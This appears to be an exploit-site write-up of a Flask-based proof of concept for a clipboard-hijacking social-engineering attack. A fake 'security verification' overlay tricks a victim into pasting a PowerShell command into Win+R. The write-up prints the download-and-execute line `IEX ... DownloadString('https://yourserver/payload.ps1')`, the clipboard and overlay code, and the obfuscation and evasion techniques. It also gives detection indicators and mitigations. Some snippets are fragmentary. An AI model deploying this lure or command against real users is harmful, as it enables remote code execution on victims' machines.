## https://sploitus.com/exploit?id=99C1E64F-2592-583B-AD37-EE5DA00AC3C0
# FlaskRCE PoC --- Technical WriteâUp
**Repository:** https://github.com/SleepTheGod/FlaskRCE\
**File:** `poc.py`
> This document explains the provided proofâofâconcept at a code and
> behavior level. It is intended for **educational, defensive, and
> research** purposes only.
------------------------------------------------------------------------
## Overview
This PoC demonstrates a **socialâengineering--assisted remote code
execution chain** built around:
- A minimal **Flask web server**
- A **heavily obfuscated JavaScript payload**
- A staged **PowerShell execution flow**
- Userâinteraction coercion rather than a browser exploit
No browser vulnerability is exploited. The execution relies on
convincing the user to paste a prepared PowerShell command into
**Win+R**.
------------------------------------------------------------------------
## HighâLevel Flow
1. Victim visits the Flask server.
2. Server responds with benignâlooking HTML.
3. Embedded JavaScript:
- Deobfuscates a PowerShell command
- Copies it to the clipboard
- Displays a fake "security verification" overlay
4. User pastes and executes the command.
5. PowerShell downloads and executes `/payload.ps1`.
6. Optional stageâ2 execution occurs.
------------------------------------------------------------------------
## Flask Application Structure
### Imports and Initialization
``` python
from flask import Flask, make_response
import base64
app = Flask(__name__)
```
- `make_response` allows full control of HTTP headers.
- No templates are used --- HTML is constructed inline.
------------------------------------------------------------------------
## Obfuscated JavaScript Payload
### Purpose
The JavaScript payload is designed to:
- Evade static analysis
- Delay detection
- Mislead the user into manual execution
### Techniques Used
Technique Purpose
--------------------- ---------------------------
Hexâescaped strings Hide readable content
Base64 encoding Obscure PowerShell
Dead code Break pattern matching
Unicode noise Confuse tokenizers
`eval()` chains Prevent static inspection
------------------------------------------------------------------------
### Embedded PowerShell Payload
Decoded PowerShell (simplified):
``` powershell
PowerShell -NoProfile -Enc
```
Decoded behavior:
``` powershell
IEX (New-Object Net.WebClient).DownloadString('https://yourserver/payload.ps1')
```
- Uses **IEX** for inâmemory execution
- Avoids touching disk initially
- Bypasses execution policy restrictions
------------------------------------------------------------------------
## Clipboard Hijacking
``` javascript
navigator.clipboard.writeText(payload);
```
- Automatically places the PowerShell command into the clipboard.
- Requires no permissions in many Chromiumâbased browsers when
userâinitiated context is implied.
------------------------------------------------------------------------
## Fake Security Overlay
``` javascript
VERIFICATION REQUIRED
Press Win + R â Ctrl + V â Enter
```
Purpose:
- Mimics CAPTCHA / browser verification flows
- Exploits user familiarity with OS dialogs
- Creates urgency and authority
This is **pure social engineering**, not exploitation.
------------------------------------------------------------------------
## Redirect & Cleanup
``` javascript
setTimeout(() => {
div.remove();
window.location = 'https://google.com';
}, 8000);
```
- Removes visible artifacts
- Redirects victim to a legitimate site
- Reduces suspicion postâexecution
------------------------------------------------------------------------
## `/payload.ps1` Endpoint
``` python
@app.route('/payload.ps1')
def payload():
Start-Process calc.exe
```
- Demonstration payload only
- Confirms execution via calculator launch
- Real attacks would load additional stages
------------------------------------------------------------------------
## CatchâAll Routing
``` python
@app.route('/')
def catch_all(dummy):
return index()
```
- Any URL serves the same payload
- Defeats pathâbased filtering
- Useful for phishing campaigns
------------------------------------------------------------------------
## Why This Works
Factor Explanation
---------------------- --------------------------------
No exploit needed User executes payload manually
Trusted UI cues "Security check" framing
Clipboard automation Reduces friction
PowerShell LOLBins Blends with admin behavior
Short lifetime Minimal forensic footprint
------------------------------------------------------------------------
## Defensive Takeaways
### Blue Team Indicators
- Unexpected clipboard writes
- `powershell.exe -enc` usage
- Win+R execution by nonâtechnical users
- Clipboard + browser + PowerShell chain
### Mitigations
- Disable PowerShell for nonâadmins
- Enforce Constrained Language Mode
- Monitor `IEX` usage
- User education against fake verification prompts
------------------------------------------------------------------------
## Final Notes
This PoC demonstrates that **RCE does not require a vulnerability** ---
only trust, habit, and persuasion.
Understanding this class of attack is critical for: - Red teams modeling
realistic threat actors - Blue teams building detection pipelines -
Security awareness training
------------------------------------------------------------------------
**Author:** SleepTheGod / Clumsy\
**Context:** Educational PoC